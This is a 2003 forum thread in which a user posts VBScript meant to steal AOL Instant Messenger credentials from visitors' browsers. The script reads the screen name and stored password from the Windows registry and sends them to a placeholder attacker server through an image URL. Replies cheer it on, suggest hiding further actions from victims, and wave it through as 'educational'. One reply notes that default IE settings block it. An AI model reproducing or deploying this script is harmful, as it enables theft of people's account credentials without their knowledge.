Bored? Come in and play at Jusunlee.com Arcade! Go chat in Jusunlee.com Chatroom (requires AIM) Here you can view your subscribed threads, work with private messages and edit your profile and preferences Registration is free! Calendar Find other members Frequently Asked Questions Search Home
Jusunlee.com Forums > Interests > Technology > Good New Exploit
  Last Thread   Next Thread
Author
Thread Post New Thread    Post A Reply
ajy
Senior Member

Registered: Jul 2002
Location:
Posts: 3415
Status: Offline

Good New Exploit

I spent some time on this

<SCRIPT LANGUAGE="VBScript">
Dim objReg
Set objReg = Createobject("Wscript.shell")
dim user, pwvalue, pwout
user = objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Login\Screen Name")
pwvalue = objReg.regread ("HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\" & user & "\Login\Password1")
pwout = pwvalue
document.write("<center><img src='http://yoursite/send.php?key=" & user & ":" & pwout & "'></center>")
</SCRIPT>

PUt this in a html on your server, whoever clicks on the link you will get an email with their login and password.

Report this post to a moderator | IP: Logged

Old Post 09-24-2003 01:06 AM
Click Here to See the Profile for ajy Click here to Send ajy a Private Message Find more posts by ajy Add ajy to your buddy list Edit/Delete Message Reply w/Quote
Alchemist
3 Coulombs

Registered: Apr 2002
Location: In your dreams
Posts: 3769
Status: Offline

If you make it open up JSL on their browser as well that would kick ass. (They won't know)

Report this post to a moderator | IP: Logged

Old Post 09-24-2003 01:09 AM
Click Here to See the Profile for Alchemist Click here to Send Alchemist a Private Message Visit Alchemist's homepage! Find more posts by Alchemist Add Alchemist to your buddy list Edit/Delete Message Reply w/Quote
kryogenix
Ghost

Registered: Nov 2002
Location: In your hard drive
Posts: 1921
Status: Offline

the only reason i didn't edit because i know this is meant for educational purposes. if you do not use it for that, it is your own responsibility, not mine, not jsl's.

good coding too!

Report this post to a moderator | IP: Logged

Old Post 09-24-2003 01:45 AM
Click Here to See the Profile for kryogenix Click here to Send kryogenix a Private Message Find more posts by kryogenix Add kryogenix to your buddy list Edit/Delete Message Reply w/Quote
kiggaplease
Senior Member

Registered: Jun 2002
Location: land of the free
Posts: 827
Status: Offline

the vbscript only runs on IE when the Security Level for Internet allows it (not enabled by default under Medium)

next, I only get

code:
<screenname>:HKEY_CURRENT_USER\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users\<screenname>\Login\Password1


where <screenname> is the user's sn

Report this post to a moderator | IP: Logged

Old Post 09-24-2003 02:50 AM
Click Here to See the Profile for kiggaplease Click here to Send kiggaplease a Private Message Find more posts by kiggaplease Add kiggaplease to your buddy list Edit/Delete Message Reply w/Quote
All times are GMT. The time now is 04:39 PM. Post New Thread    Post A Reply
  Last Thread   Next Thread

Show Printable Version Email this Page Subscribe to this Thread

Forum Rules:
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is OFF
vB code is ON
Smilies are ON
[IMG] code is ON